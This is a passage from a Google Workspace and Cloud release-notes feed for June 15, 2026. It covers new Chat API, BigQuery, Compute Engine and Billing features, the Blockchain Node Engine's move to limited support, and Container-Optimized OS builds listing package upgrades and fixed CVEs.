    <content type="html">&lt;h2 class="release-note-product-title"&gt;Chat API&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Developer Preview:&lt;/strong&gt; You can now use the &lt;a href="https://developers.google.com/workspace/chat/api/reference/rest/v1/spaces/search"&gt;&lt;code&gt;search&lt;/code&gt;&lt;/a&gt; method of the Google Chat API to manage and search for spaces that the calling user is a member of without administrator privileges. This feature is available as part of the &lt;a href="https://developers.google.com/workspace/preview"&gt;Developer Preview Program&lt;/a&gt;.&lt;/p&gt;</content>
    <link href="https://developers.google.com/workspace/release-notes#June_15_2026" rel="alternate"/>
    <category term="Workspace Release Notes"/>
    <published>2026-06-15T07:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://docs.cloud.google.com/release-notes#June_15_2026</id>
    <title>Cloud Release Notes — June 15, 2026</title>
    <updated>2026-06-15T07:00:00+00:00</updated>
    <content type="html">&lt;h2 class="release-note-product-title"&gt;AI Hypercomputer&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Preview&lt;/strong&gt;: Before you create Spot VMs, you can view the real-time
availability, estimated uptime, historical preemption rate, and pricing for a
specific machine type and location. This information helps you maximize the
chances of successfully creating Spot VMs and choose the
configuration that best fits your workload needs and budget. For more
information, see &lt;a href="https://docs.cloud.google.com/ai-hypercomputer/docs/consumption-models#spot"&gt;Use Spot&lt;/a&gt;.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;AlloyDB for PostgreSQL&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;The Database Insights remote Model Context Protocol (MCP) server now supports
the following advanced query insights tools for AlloyDB for PostgreSQL:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;get_advanced_aggregated_query_stats&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;get_advanced_aggregated_wait_event_stats&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;get_advanced_time_series_query_stats&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;get_advanced_time_series_wait_event_stats&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;get_index_recommendations&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;For more information, see &lt;a href="https://docs.cloud.google.com/alloydb/docs/reference/mcp/databaseinsights/mcp/index"&gt;Database Insights remote MCP server&lt;/a&gt;.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Anti Money Laundering AI&lt;/h2&gt;
&lt;h3&gt;Announcement&lt;/h3&gt;
&lt;p&gt;New minor engine versions released for the commercial line of business within the &lt;code&gt;v004.009&lt;/code&gt; and &lt;code&gt;v004.010&lt;/code&gt; version lines. These versions extend support for the major engine version and include no significant changes compared to the previous minor versions.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;BigQuery&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;Use Gemini Cloud Assist to analyze your SQL queries and receive
recommendations to &lt;a href="https://docs.cloud.google.com/bigquery/docs/use-cloud-assist#optimize-query"&gt;optimize query performance in BigQuery&lt;/a&gt;.
This feature is available to customers who use BigQuery editions.
This feature is in
&lt;a href="https://cloud.google.com/products#product-launch-stages"&gt;Preview&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;Issue&lt;/h3&gt;
&lt;p&gt;Support for configuring daily token quotas for BigQuery generative AI
functions has been temporarily disabled. We are working to restore this
feature as soon as possible.&lt;/p&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;You can resize the width of table columns in BigQuery Studio for
BigQuery listings such as datasets, repositories, job history,
and connections. To resize a column, hover over the column divider and drag it
to your preferred width.&lt;/p&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;You can use Gemini Code Assist directly within the BigQuery &lt;strong&gt;Jobs explorer&lt;/strong&gt;,
&lt;strong&gt;Job details&lt;/strong&gt;, &lt;strong&gt;Job history&lt;/strong&gt;, and &lt;strong&gt;Capacity management&lt;/strong&gt; pages to help you
troubleshoot and analyze performance issues. For more information, see
&lt;a href="https://docs.cloud.google.com/bigquery/docs/admin-jobs-explorer#get-job-details"&gt;Troubleshoot job
performance&lt;/a&gt;. This feature
is in &lt;a href="https://cloud.google.com/products#product-launch-stages"&gt;Preview&lt;/a&gt;.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Blockchain Node Engine&lt;/h2&gt;
&lt;h3&gt;Announcement&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Limited support for Blockchain Node Engine&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Starting June 15, 2026, Blockchain Node Engine will enter a period of limited support.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;p&gt;New node creation in Blockchain Node Engine and provisioning of new Blockchain RPC endpoints will be disabled.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Existing nodes and endpoints will continue to function and receive critical updates until the final shutdown date.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;We recommend migrating your workloads to our partner, &lt;a href="https://www.quicknode.com/gcp-node-migration"&gt;&lt;strong&gt;Quicknode&lt;/strong&gt;&lt;/a&gt;, to avoid service disruption.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;For more information, see the &lt;a href="https://docs.cloud.google.com/blockchain-node-engine/docs/migrate-to-quicknode.md"&gt;migration guide&lt;/a&gt;.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Cloud Billing&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;New filters and group-by options available in Cloud Billing Reports&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Cloud Billing has added two &lt;strong&gt;filters&lt;/strong&gt; to the &lt;strong&gt;Billing Reports&lt;/strong&gt;
page to help you analyze and understand your costs:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Products&lt;/strong&gt;: Google Cloud
&lt;a href="https://docs.cloud.google.com/billing/docs/how-to/reports#filter-by-products"&gt;Products&lt;/a&gt;
consist of a group of SKUs (potentially from more than one
&lt;a href="https://docs.cloud.google.com/billing/docs/how-to/reports#filter-by-services"&gt;Google Cloud &lt;em&gt;Service&lt;/em&gt;&lt;/a&gt;)
that work together and are sold as a single service, sometimes referred to as
a &lt;em&gt;logical&lt;/em&gt; product family or a subscription service. Examples include
Gemini Enterprise and Firebase App Hosting.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Originating services&lt;/strong&gt;: An
&lt;a href="https://docs.cloud.google.com/billing/docs/how-to/reports#filter-by-orig-services"&gt;Originating service&lt;/a&gt;
is a Google Cloud service that causes usage in another service. For
example, Google Kubernetes Engine (GKE) can cause usage in Compute Engine. In
this use case, when you are viewing the Compute Engine usage and
costs, GKE is an originating service when it causes usage
in Compute Engine.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;You can also
&lt;a href="https://docs.cloud.google.com/billing/docs/how-to/reports#group-by"&gt;&lt;strong&gt;Group by&lt;/strong&gt;&lt;/a&gt; the new filters, to
summarize your costs by the dimension you select.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Product&lt;/strong&gt;: When you
&lt;a href="https://docs.cloud.google.com/billing/docs/how-to/reports#group-by-product"&gt;group by &lt;em&gt;Product&lt;/em&gt;&lt;/a&gt;,
the Report shows your costs and savings summarized by Product.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Originating service &amp;gt; Service&lt;/strong&gt;: When you
&lt;a href="https://docs.cloud.google.com/billing/docs/how-to/reports#group-by-orig-service"&gt;group by &lt;em&gt;Originating service &amp;gt; Service&lt;/em&gt;&lt;/a&gt;,
the Report shows your costs and savings summarized by Originating service.
In the &lt;strong&gt;report table&lt;/strong&gt;, you can expand each row for an &lt;em&gt;Originating service&lt;/em&gt;
to see your costs summarized by each &lt;em&gt;Service&lt;/em&gt; that is associated with the
&lt;em&gt;Originating service&lt;/em&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Learn more about &lt;a href="https://docs.cloud.google.com/billing/docs/how-to/reports"&gt;analyzing billing data and cost trends with Reports&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Learn how to &lt;a href="https://docs.cloud.google.com/billing/docs/how-to/reports/gemini-enterprise-costs"&gt;view Gemini Enterprise costs in Cloud Billing reports&lt;/a&gt;.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Cloud Service Mesh&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;The &lt;a href="https://docs.cloud.google.com/service-mesh/docs/data-plane-extensibility#typegoogleapiscomenvoyextensionsfiltershttpcompressorv3compressor"&gt;Envoy Compressor Filter&lt;/a&gt;
is now GA in the rapid release channel.&lt;/p&gt;
&lt;p&gt;To ensure your &lt;code&gt;EnvoyFilter&lt;/code&gt; compressor configuration is fully supported, see
&lt;a href="https://docs.cloud.google.com/service-mesh/docs/migrate/modernize-envoyfilter-compressor"&gt;Modernize EnvoyFilter compressor configurations&lt;/a&gt;.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Compute Engine&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Preview&lt;/strong&gt;: Before you create Spot VMs, you can view the following
  information for a specific machine type and location:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;You can view the real-time obtainability and estimated uptime&lt;/strong&gt;. This
information helps you maximize your chances of successfully creating
Spot VMs, as well as help ensure that your workload starts
and runs efficiently.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;You can view historical and current preemption rate and pricing&lt;/strong&gt;. This
information helps you compare and choose the configuration that best fits
your workload needs and budget.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;For more information, see
&lt;a href="https://docs.cloud.google.com/compute/docs/instances/view-vm-availability"&gt;View the availability of Spot VMs&lt;/a&gt;
and
&lt;a href="https://docs.cloud.google.com/compute/docs/instances/view-spot-preemption-price"&gt;View the preemption rate and pricing for Spot VMs&lt;/a&gt;.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Container Optimized OS&lt;/h2&gt;
&lt;h3&gt;Change&lt;/h3&gt;
&lt;h3 id="cos-129-19506-224-36_"&gt;cos-129-19506-224-36 &lt;a id="&amp;quot;cos-arm64-129-19506-224-36&amp;quot;/"&gt;&lt;/a&gt;&lt;/h3&gt;
&lt;table class="pkg"&gt;
&lt;tr&gt;
&lt;td&gt;Kernel&lt;/td&gt;
&lt;td&gt;Docker&lt;/td&gt;
&lt;td&gt;Containerd&lt;/td&gt;
&lt;td&gt;&lt;a href="https://cloud.google.com/container-optimized-os/docs/how-to/run-gpus"&gt;GPU Drivers&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;a href="https://cos.googlesource.com/third_party/kernel/+/fac8e2b17485d0065f6f69f83ddb8eb0e9d9c55a"&gt;COS-6.12.90&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;v27.5.1&lt;/td&gt;
&lt;td&gt;v2.2.3&lt;/td&gt;
&lt;td&gt;&lt;a href="https://storage.googleapis.com/cos-tools/19506.224.36/lakitu/gpu_driver_versions.textproto"&gt;See List&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/table&gt;
&lt;h3&gt;Change&lt;/h3&gt;
&lt;h3 id="cos-dev-133-19862-0-0_"&gt;cos-dev-133-19862-0-0 &lt;a id="&amp;quot;cos-arm64-dev-133-19862-0-0&amp;quot;/"&gt;&lt;/a&gt;&lt;/h3&gt;
&lt;table class="pkg"&gt;
&lt;tr&gt;
&lt;td&gt;Kernel&lt;/td&gt;
&lt;td&gt;Docker&lt;/td&gt;
&lt;td&gt;Containerd&lt;/td&gt;
&lt;td&gt;&lt;a href="https://cloud.google.com/container-optimized-os/docs/how-to/run-gpus"&gt;GPU Drivers&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;a href="https://cos.googlesource.com/third_party/kernel/+/ef0c067405ff6956b986d853c39c609e6d457228"&gt;COS-6.18.35&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;v29.4.3&lt;/td&gt;
&lt;td&gt;v2.2.3&lt;/td&gt;
&lt;td&gt;&lt;a href="https://storage.googleapis.com/cos-tools/19862.0.0/lakitu/gpu_driver_versions.textproto"&gt;See List&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/table&gt;
&lt;h3&gt;Fixed&lt;/h3&gt;
&lt;p&gt;Upgraded app-admin/fluent-bit to v4.2.5.&lt;/p&gt;
&lt;h3&gt;Fixed&lt;/h3&gt;
&lt;p&gt;Upgraded cos-gpu-installer to v2.7.3.&lt;/p&gt;
&lt;h3&gt;Change&lt;/h3&gt;
&lt;p&gt;Allow overriding IMA policy from oem partition.&lt;/p&gt;
&lt;h3&gt;Fixed&lt;/h3&gt;
&lt;p&gt;Upgraded sys-apps/less to v702.&lt;/p&gt;
&lt;h3&gt;Change&lt;/h3&gt;
&lt;p&gt;On cchost boards, autoload IMA policy on boot.&lt;/p&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;Fixed CVE-2025-71289 in the Linux kernel.&lt;/p&gt;
&lt;h3&gt;Change&lt;/h3&gt;
&lt;p&gt;Set static UUID for the stateful partition.&lt;/p&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;Fixed CVE-2026-43245 in the Linux kernel.&lt;/p&gt;
&lt;h3&gt;Change&lt;/h3&gt;
&lt;p&gt;Update sys-process/audit to v3.0.9.&lt;/p&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;Fixed CVE-2026-43503 in the Linux kernel.&lt;/p&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;Fixed CVE-2026-45838 in the Linux kernel.&lt;/p&gt;
&lt;h3&gt;Change&lt;/h3&gt;
&lt;p&gt;Updated glib to v2.86.5.&lt;/p&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;Fixed CVE-2026-45839 in the Linux kernel.&lt;/p&gt;
&lt;h3&gt;Change&lt;/h3&gt;
&lt;p&gt;Updated sys-libs/pam to v1.5.3.&lt;/p&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;Fixed CVE-2026-45841 in the Linux kernel.&lt;/p&gt;
&lt;h3&gt;Change&lt;/h3&gt;
&lt;p&gt;Updated the Linux kernel to v6.18.35.&lt;/p&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;Fixed CVE-2026-45842 in the Linux kernel.&lt;/p&gt;
&lt;h3&gt;Change&lt;/h3&gt;
&lt;p&gt;Upgraded net-misc/openssh to v10.0_p2.&lt;/p&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;Fixed CVE-2026-45843 in the Linux kernel.&lt;/p&gt;
&lt;h3&gt;Change&lt;/h3&gt;
&lt;p&gt;Upgraded sys-apps/ek-cpu-balloon to v1.2.3.&lt;/p&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;Fixed CVE-2026-45844 in the Linux kernel.&lt;/p&gt;
&lt;h3&gt;Fixed&lt;/h3&gt;
&lt;p&gt;Added support for NVIDIA driver v580.159.04.&lt;/p&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;Fixed CVE-2026-46243 in the Linux kernel.&lt;/p&gt;
&lt;h3&gt;Fixed&lt;/h3&gt;
&lt;p&gt;Fixed a crash that occurs when using the &lt;code&gt;configfile&lt;/code&gt; or
&lt;code&gt;source&lt;/code&gt; GRUB2 commands when Secure Boot is enabled.&lt;/p&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;Fixed CVE-2026-46244 in the Linux kernel.&lt;/p&gt;
&lt;h3&gt;Fixed&lt;/h3&gt;
&lt;p&gt;Upgraded app-containers/docker to v29.4.3, Upgraded app-containers/docker-test to v29.4.3, Upgraded app-containers/docker-cli to v29.4.3.&lt;/p&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;Fixed CVE-2026-46274 in the Linux kernel.&lt;/p&gt;
&lt;h3&gt;Fixed&lt;/h3&gt;
&lt;p&gt;Upgraded app-containers/docker-credential-helpers to v0.9.7.&lt;/p&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;Fixed CVE-2026-46300 in the Linux kernel.&lt;/p&gt;
&lt;h3&gt;Fixed&lt;/h3&gt;
&lt;p&gt;Upgraded cos-gpu-installer to v2.7.2.&lt;/p&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;Fixed CVE-2026-46316 in the Linux kernel.&lt;/p&gt;
&lt;h3&gt;Fixed&lt;/h3&gt;
&lt;p&gt;Upgraded sys-apps/gentoo-functions to v1.7.7.&lt;/p&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;Fixed KCTF-def602e in the Linux kernel.&lt;/p&gt;
&lt;h3&gt;Fixed&lt;/h3&gt;
&lt;p&gt;Upgraded sys-apps/less to v702.&lt;/p&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;Fixed KCTF-e5b31d9 in the Linux kernel.&lt;/p&gt;
&lt;h3&gt;Fixed&lt;/h3&gt;
&lt;p&gt;Upgraded sys-libs/libcap-ng to v0.9.3.&lt;/p&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;Updated dev-python/pyjwt to v2.13.0. This fixes
CVE-2026-48522, CVE-2026-48524, CVE-2026-48525, CVE-2026-485256.&lt;/p&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;Fixed CVE-2026-44431 in dev-python/urllib3.&lt;/p&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;Fixed CVE-2026-6732 in dev-libs/libxml2.&lt;/p&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;Updated dev-lang/go to 1.25.10. This fixes CVE-2026-33814,CVE-2026-39819,CVE-2026-39823,CVE-2026-39825,CVE-2026-42499,CVE-2026-39817,CVE-2026-39820,CVE-2026-39826,CVE-2026-39836.&lt;/p&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;Updated dev-python/pyjwt to v2.13.0. This fixes
CVE-2026-48522, CVE-2026-48524, CVE-2026-48525, CVE-2026-485256.&lt;/p&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;Updated net-misc/curl to v8.20. This fixes CVE-2026-5545,CVE-2026-4873,CVE-2026-6429,CVE-2026-7168,CVE-2026-6253,CVE-2026-6276,CVE-2026-7009,CVE-2026-5773.&lt;/p&gt;
&lt;h3&gt;Change&lt;/h3&gt;
&lt;h3 id="cos-117-18613-613-56_"&gt;cos-117-18613-613-56 &lt;a id="&amp;quot;cos-arm64-117-18613-613-56&amp;quot;/"&gt;&lt;/a&gt;&lt;/h3&gt;
&lt;table class="pkg"&gt;
&lt;tr&gt;
&lt;td&gt;Kernel&lt;/td&gt;
&lt;td&gt;Docker&lt;/td&gt;
&lt;td&gt;Containerd&lt;/td&gt;
&lt;td&gt;&lt;a href="https://cloud.google.com/container-optimized-os/docs/how-to/run-gpus"&gt;GPU Drivers&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;a href="https://cos.googlesource.com/third_party/kernel/+/7ead0fd4c30a3ac938a51edf82fd36b526ffa21b"&gt;COS-6.6.137&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;v24.0.9&lt;/td&gt;
&lt;td&gt;v1.7.31&lt;/td&gt;
&lt;td&gt;&lt;a href="https://storage.googleapis.com/cos-tools/18613.613.56/lakitu/gpu_driver_versions.textproto"&gt;See List&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/table&gt;
&lt;h3&gt;Fixed&lt;/h3&gt;
&lt;p&gt;Fixed a race condition triggered by ext4 online resize that
rarely causes machines to fail to boot.&lt;/p&gt;
&lt;h3&gt;Fixed&lt;/h3&gt;
&lt;p&gt;Upgraded cos-gpu-installer to v2.7.4.&lt;/p&gt;
&lt;h3&gt;Fixed&lt;/h3&gt;
&lt;p&gt;Upgraded dev-libs/libusb to v1.0.30.&lt;/p&gt;
&lt;h3&gt;Fixed&lt;/h3&gt;
&lt;p&gt;Upgraded sys-apps/less to v702.&lt;/p&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;Fixed CVE-2024-56647 in the Linux kernel.&lt;/p&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;Fixed CVE-2025-38584 in the Linux kernel.&lt;/p&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;Fixed CVE-2026-23272 in the Linux kernel.&lt;/p&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;Fixed CVE-2026-23394 in the Linux kernel.&lt;/p&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;Fixed CVE-2026-31527 in the Linux kernel.&lt;/p&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;Fixed CVE-2026-43492 in the Linux kernel.&lt;/p&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;Fixed CVE-2026-43496 in the Linux kernel.&lt;/p&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;Fixed CVE-2026-43503 in the Linux kernel.&lt;/p&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;Fixed CVE-2026-46243 in the Linux kernel.&lt;/p&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;Fixed CVE-2026-46244 in the Linux kernel.&lt;/p&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;Fixed CVE-2026-46274 in the Linux kernel.&lt;/p&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;Fixed CVE-2026-46289 in the Linux kernel.&lt;/p&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;Fixed CVE-2026-46294 in the Linux kernel.&lt;/p&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;Fixed CVE-2026-46303 in the Linux kernel.&lt;/p&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;Fixed CVE-2026-46304 in the Linux kernel.&lt;/p&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;Fixed CVE-2026-46306 in the Linux kernel.&lt;/p&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;Updated dev-python/pyjwt to v2.13.0. This fixes
CVE-2026-48522, CVE-2026-48524, CVE-2026-48525, CVE-2026-485256.&lt;/p&gt;
&lt;h3&gt;Change&lt;/h3&gt;
&lt;h3 id="cos-125-19216-395-101_"&gt;cos-125-19216-395-101 &lt;a id="&amp;quot;cos-arm64-125-19216-395-101&amp;quot;/"&gt;&lt;/a&gt;&lt;/h3&gt;
&lt;table class="pkg"&gt;
&lt;tr&gt;
&lt;td&gt;Kernel&lt;/td&gt;
&lt;td&gt;Docker&lt;/td&gt;
&lt;td&gt;Containerd&lt;/td&gt;
&lt;td&gt;&lt;a href="https://cloud.google.com/container-optimized-os/docs/how-to/run-gpus"&gt;GPU Drivers&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;a href="https://cos.googlesource.com/third_party/kernel/+/19cc070c0f9a696f1ec666a1c12e685222e54963"&gt;COS-6.12.85&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;v27.5.1&lt;/td&gt;
&lt;td&gt;v2.1.7&lt;/td&gt;
&lt;td&gt;&lt;a href="https://storage.googleapis.com/cos-tools/19216.395.101/lakitu/gpu_driver_versions.textproto"&gt;See List&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/table&gt;
&lt;h3&gt;Fixed&lt;/h3&gt;
&lt;p&gt;Fixed a race condition triggered by ext4 online resize that
rarely causes machines to fail to boot.&lt;/p&gt;
&lt;h3&gt;Fixed&lt;/h3&gt;
&lt;p&gt;Upgraded cos-gpu-installer to v2.7.4.&lt;/p&gt;
&lt;h3&gt;Fixed&lt;/h3&gt;
&lt;p&gt;Upgraded sys-apps/less to v702.&lt;/p&gt;
&lt;h3&gt;Fixed&lt;/h3&gt;
&lt;p&gt;Uprev sys-kernel/lakitu-kernel-6_12 to v6.12.92&lt;/p&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;Fixed CVE-2025-71289 in the Linux kernel.&lt;/p&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;Fixed CVE-2026-23394 in the Linux kernel.&lt;/p&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;Fixed CVE-2026-43245 in the Linux kernel.&lt;/p&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;Fixed CVE-2026-46160 in the Linux kernel.&lt;/p&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;Fixed CVE-2026-46244 in the Linux kernel.&lt;/p&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;Fixed CVE-2026-46274 in the Linux kernel.&lt;/p&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;Fixed CVE-2026-46283 in the Linux kernel.&lt;/p&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;Fixed CVE-2026-46289 in the Linux kernel.&lt;/p&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;Fixed CVE-2026-46294 in the Linux kernel.&lt;/p&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;Fixed CVE-2026-46303 in the Linux kernel.&lt;/p&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;Fixed CVE-2026-46304 in the Linux kernel.&lt;/p&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;Fixed CVE-2026-46306 in the Linux kernel.&lt;/p&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;Fixed CVE-2026-46316 in the Linux kernel.&lt;/p&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;Fixed KCTF-def602e in the Linux kernel.&lt;/p&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;Updated dev-python/pyjwt to v2.13.0. This fixes
CVE-2026-48522, CVE-2026-48524, CVE-2026-48525, CVE-2026-485256.&lt;/p&gt;
&lt;h3&gt;Change&lt;/h3&gt;
&lt;h3 id="cos-121-18867-381-177_"&gt;cos-121-18867-381-177 &lt;a id="&amp;quot;cos-arm64-121-18867-381-177&amp;quot;/"&gt;&lt;/a&gt;&lt;/h3&gt;
&lt;table class="pkg"&gt;
&lt;tr&gt;
&lt;td&gt;Kernel&lt;/td&gt;
&lt;td&gt;Docker&lt;/td&gt;
&lt;td&gt;Containerd&lt;/td&gt;
&lt;td&gt;&lt;a href="https://cloud.google.com/container-optimized-os/docs/how-to/run-gpus"&gt;GPU Drivers&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;a href="https://cos.googlesource.com/third_party/kernel/+/0b06ec28c776324f21325b54d9c4c8e501b34301"&gt;COS-6.6.137&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;v27.5.1&lt;/td&gt;
&lt;td&gt;v2.0.8&lt;/td&gt;
&lt;td&gt;&lt;a href="https://storage.googleapis.com/cos-tools/18867.381.177/lakitu/gpu_driver_versions.textproto"&gt;See List&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/table&gt;
&lt;h3&gt;Fixed&lt;/h3&gt;
&lt;p&gt;Fixed a race condition triggered by ext4 online resize that
rarely causes machines to fail to boot.&lt;/p&gt;
&lt;h3&gt;Fixed&lt;/h3&gt;
&lt;p&gt;Upgraded cos-gpu-installer to v2.7.4.&lt;/p&gt;
&lt;h3&gt;Fixed&lt;/h3&gt;
&lt;p&gt;Upgraded sys-apps/less to v702.&lt;/p&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;Fixed CVE-2026-23394 in the Linux kernel.&lt;/p&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;Fixed CVE-2026-31527 in the Linux kernel.&lt;/p&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;Fixed CVE-2026-43492 in the Linux kernel.&lt;/p&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;Fixed CVE-2026-43496 in the Linux kernel.&lt;/p&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;Fixed CVE-2026-46243 in the Linux kernel.&lt;/p&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;Fixed CVE-2026-46244 in the Linux kernel.&lt;/p&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;Fixed CVE-2026-46274 in the Linux kernel.&lt;/p&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;Fixed CVE-2026-46289 in the Linux kernel.&lt;/p&gt;
&lt;h3&gt;Security&lt;/h3&gt;
